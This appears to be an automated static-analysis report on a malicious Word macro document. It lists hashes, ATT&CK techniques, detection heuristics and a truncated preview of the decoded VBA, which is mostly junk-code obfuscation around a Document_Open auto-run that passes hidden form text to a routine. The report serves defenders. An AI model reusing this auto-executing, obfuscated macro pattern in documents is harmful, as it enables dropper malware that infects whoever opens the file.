Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 428e3a2342afff73…

MALICIOUS

Office (OLE)

247.5 KB Created: 2018-09-27 22:19:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 8c18a7d96c4dd47f97ccf80a8252d2a4 SHA-1: 0f3c01d51e75dedc0f8c828676bb0fe72c58e01e SHA-256: 428e3a2342afff737ba8e12b87ef25b87d939826597d778f40aab17ff54d543f
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is configured to execute a 'Shell()' command, indicating an attempt to download and execute a second-stage payload. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', which is a common social engineering tactic to bypass macro security settings.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 69369 bytes
SHA-256: 646074da6e52c2c10c90f4dc256e944483d35f71cbe273d33a4db9bff88651ba
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
Set frm = New frmMain
Call Hitler(frm.txtBox.Text)
End Sub

Attribute VB_Name = "Cgx8sRWwN"
Sub Hitler(FBFSEMs1)
If 26 < 188 Then
' vseuO
Else
' qcWVATBl
MsgBox "FFbeR"
End If
If 26 < 188 Then
' rHAOyR
Else
' ePSek4pc
Debug.Print "dbkGIPwf"
End If
Dim QnbKS
QnbKS = 95
While QnbKS <= 556
QnbKS = QnbKS + 31
Wend
lHpKNBJ = "ILXOw"
uT4FtPu = v7p10Hd & QnbKS
Dim vJ0Id
vJ0Id = 124
While vJ0Id < 658
vJ0Id = vJ0Id + 61
Wend
kxUCP = "fC6NhvYW"
mUE4uJV = vi1zjN8r & vJ0Id
If 36 < 187 Then
' pBvVI0
Else
' vuTcJm
Debug.Print "kqdTa"
End If
If 39 < 145 Then
' Mu45mDga
Else
' YCU7ZYkR
MsgBox "BJGYOrZE"
End If
Dim h2StdGh
h2StdGh = 210
While h2StdGh < 841
h2StdGh = h2StdGh + 44
Wend
zCaQKLt3Z = "m8iy6"
HW2YxE0y = Ia4x8iV & h2StdGh
If 9915 / 15 = 1243 - 1232 Then
Zy4Ebp = "YVoFD3mex"
End If
einZEHfRh = 56269
tGMhRnx7 = Zy4Ebp & einZEHfRh
Dim kImGlL5TF
kImGlL5TF = 210
While kImGlL5TF < 841
kImGlL5TF = kImGlL5TF + 44
Wend
T0E2RAPuB = 56269
wDgem9NQW = D5Lc4pa & kImGlL5TF
If 14 < 160 Then
' BiGOF
Else
' De362p
Debug.Print "wag4lR2J"
End If
Dim dNyUK
dNyUK = 192
While dNyUK <= 593
dNyUK = dNyUK + 48
Wend
vzrg45WjQ = 52677
mJCoVs = V6yUTVB & dNyUK
If 8008 / 8 = 1478 - 1465 Then
NIlFdZWT = "UQMuy0j"
End If
SQv0cS = 52677
LgRld9cF4 = NIlFdZWT & SQv0cS
If 29928 / 86 = 13680 / 13680 Then
xJLGzfH = "yviKdSo"
End If
aB03PqR = "E15gc"
sdxZ9 = xJLGzfH & aB03PqR
If 48 < 237 Then
' AF7V9d4
Else
' IGRpw
MsgBox "oBIesQH"
End If
If 29928 / 86 = 13680 / 13680 Then
FCgPdEte = "nHJQNU9L"
End If
m6xHl2YmJ = "NiDLG"
fw6trliJ7 = FCgPdEte & m6xHl2YmJ
If 28512 / 132 = 2312 - 2311 Then
Cfly3wrbJ = "x0ODk"
End If
QbERAS = "JQFJuO9fy"
bpSxfDHsm = Cfly3wrbJ & QbERAS
Dim ShFSs
ShFSs = 211
While ShFSs < 865
ShFSs = ShFSs + 52
Wend
ht8JR45B = 5683
M5F8YHC0X = bNfIop1yd & ShFSs
If 15 < 195 Then
' lBLuvnQU
Else
' yRmjVJn
Debug.Print "cSA2Ua0"
End If
Dim O3trl4SsO
O3trl4SsO = 0
While O3trl4SsO < 660
O3trl4SsO = O3trl4SsO + 54
Wend
qQaeTON = 30678
Haw2vc = egLm9FCVZ & O3trl4SsO
Dim cU8m5n4qk
cU8m5n4qk = 95
While cU8m5n4qk < 298
cU8m5n4qk = cU8m5n4qk + 52
Wend
rjV05xZMI = 10216
ZPJAKXx = ykNpD & cU8m5n4qk
If 36 < 181 Then
' AD3s5
Else
' cJQre
MsgBox "OA5MGBLY"
End If
If 18900 / 35 = 1498 - 1483 Then
ZGVD7pk = "tLkpj1ur"
End If
ek0boR2W = 54797
awmDC1is = ZGVD7pk & ek0boR2W
If 53 < 249 Then
' KNIDt16s
Else
' s0AEPi
MsgBox "QsbHTDLMi"
End If
If 27 < 184 Then
' cR1DCXtch
Else
' fMXKQjYf
MsgBox "azKYexb"
End If
If 27 < 184 Then
' eY6uhl
Else
' m2Xd0Bl
Debug.Print "HJmoqH9"
End If
Dim fxegGX
fxegGX = 244
While fxegGX < 445
fxegGX = fxegGX + 27
Wend
uoy58p = "Zf94Rv"
BOwR4 = YDKxtoJ & fxegGX
If 755 * 1 = 31738 / 2267 Then
fkXiboWGy = "XHWLt4Qi"
End If
WPUWdemAu = 45903
O4cPd16 = fkXiboWGy & WPUWdemAu
If 755 * 1 = 31738 / 2267 Then
v1EVLD = "JufsK3t"
End If
xJ1km = 45903
AFRH9x = v1EVLD & xJ1km
If 3724 / 133 = -4833 + 4836 Then
btkjLYnrD = "dZwH5oc"
End If
iU92C3 = 28948
S9Kp4RX5S = btkjLYnrD & iU92C3
Dim NRypK
NRypK = 46
While NRypK <= 515
NRypK = NRypK + 16
Wend
Ko6Os = "J5n1Vtrd"
n4EMNv9eC = PWmjiqw & NRypK
Dim ul3cb
ul3cb = 46
While ul3cb < 515
ul3cb = ul3cb + 16
Wend
Zeb4HpS = "GB0wvT78"
I5Gqu = tygRD & ul3cb
Dim mGNhkadL
mGNhkadL = 236
While mGNhkadL < 1016
mGNhkadL = mGNhkadL + 24
Wend
Uy8DXKls = "UWNondcv"
Q60X5k = CnwrDGPIt & mGNhkadL
Dim DSBPL
DSBPL = 236
While DSBPL <= 1016
DSBPL = DSBPL + 24
Wend
Sw6nI = "OWd4qa9p"
wjx2FDT = bXP5sN1 & DSBPL
If 6384 / 12 = 1037 - 1036 Then
XdWipm = "NEqMB6"
End If
e5Jl37R = "ecpoe4Lab"
EaiPKlg8 = XdWipm & e5Jl37R
Dim ogjVBdoWC
ogjVBdoWC = 236
While ogjVBdoWC < 1016
ogjVBdoWC = ogjVBdoWC + 24
Wend
hvl78 = "pAUqiB1d"
ijJW6d
... (truncated)